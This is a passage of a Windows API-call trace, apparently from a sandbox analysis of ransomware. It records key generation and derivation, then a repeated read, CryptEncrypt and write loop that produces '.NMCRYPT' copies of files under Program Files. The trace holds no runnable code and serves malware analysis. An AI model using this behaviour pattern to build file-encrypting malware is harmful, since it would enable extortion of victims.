[0157.169] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.170] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.170] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.171] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0157.171] CryptHashData (hHash=0x9ad3b8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.171] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad3b8, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad438) returned 1 [0157.171] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0157.171] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0157.171] wcslen (_String="\\\\?\\") returned 0x4 [0157.171] CryptDuplicateKey (in: hKey=0x9ad438, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad838) returned 1 [0157.171] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0157.172] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0157.172] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=9803) returned 1 [0157.172] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0157.172] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.174] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.174] GetLastError () returned 0x0 [0157.174] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.175] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.175] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.175] GetLastError () returned 0x0 [0157.175] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.175] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.175] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.175] GetLastError () returned 0x0 [0157.175] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.175] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.175] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.175] GetLastError () returned 0x0 [0157.175] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.175] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.175] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.175] GetLastError () returned 0x0 [0157.175] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.175] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.176] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.176] GetLastError () returned 0x0 [0157.176] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.176] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.176] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.176] GetLastError () returned 0x0 [0157.176] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.176] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.176] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.176] GetLastError () returned 0x0 [0157.176] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.176] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.176] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.176] GetLastError () returned 0x0 [0157.176] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.176] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.176] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.176] GetLastError () returned 0x0 [0157.176] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.176] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.176] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.176] GetLastError () returned 0x0 [0157.176] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.176] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.176] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.177] GetLastError () returned 0x0 [0157.177] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.177] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.177] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.177] GetLastError () returned 0x0 [0157.177] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.177] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.177] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.177] GetLastError () returned 0x0 [0157.177] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.177] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.177] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.177] GetLastError () returned 0x0 [0157.177] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.177] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.177] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.177] GetLastError () returned 0x0 [0157.177] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.177] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.177] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.177] GetLastError () returned 0x0 [0157.177] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.177] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.177] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.178] GetLastError () returned 0x0 [0157.178] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.178] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.178] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.178] GetLastError () returned 0x0 [0157.178] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.178] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.178] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.178] GetLastError () returned 0x0 [0157.178] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.178] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.178] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.178] GetLastError () returned 0x0 [0157.178] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.178] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.178] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.178] GetLastError () returned 0x0 [0157.178] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.178] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.178] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.178] GetLastError () returned 0x0 [0157.178] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.178] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.178] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.179] GetLastError () returned 0x0 [0157.179] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.179] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.179] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.179] GetLastError () returned 0x0 [0157.179] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.179] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.179] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.179] GetLastError () returned 0x0 [0157.179] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.179] ReadFile 